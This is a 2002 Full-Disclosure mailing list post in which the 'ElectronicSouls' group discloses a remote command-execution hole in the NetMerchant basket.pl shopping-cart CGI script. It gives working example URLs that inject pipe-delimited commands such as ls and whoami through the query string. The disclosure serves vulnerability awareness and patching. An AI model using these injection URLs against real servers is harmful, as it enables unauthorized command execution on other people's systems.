'[Full-Disclosure] [ElectronicSouls] - basket.pl hole'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-Disclosure] [ElectronicSouls] - basket.pl hole
From:       es () hush ! com
Date:       2002-11-30 2:17:56
[Download RAW message or body]


-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Vux found a deadly hole in basket.pl.

Here it is for you.

# cat ESnetmerchant.txt
(C) 2002 vuxie [ E l e c t r o n i c  S o u l s ]

    RESEARCH! PVT!!!

It's NetMerchant BuG. Using your browser you can execute any command on the remo
te server but without parametres because it filters 0x20 symbol!
Examples: http://www.url.com/cgi-bin/basket.pl/bigheadshop?|command|
http://www.url.com/cgi-bin/basket.pl/bigheadshop?|ls| - will execute command ls!
http://www.url.com/cgi-bin/basket.pl/bigheadshop?|whoami| - will show you which
user are you (apache).
etc.

greetz: BRAIN STORM , ES-TEAM!

#

The Electronic Souls Team
[ElectronicSouls] (c) 2002

"What's up, Rabbit?"


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3oH+gMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltqsYAoIRvF3sLrdTB
H0to4U+UrKDw/eLxAKCvna7BDFRgOFnX2GNjP/P/7j/7Kw==
=yXWx
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic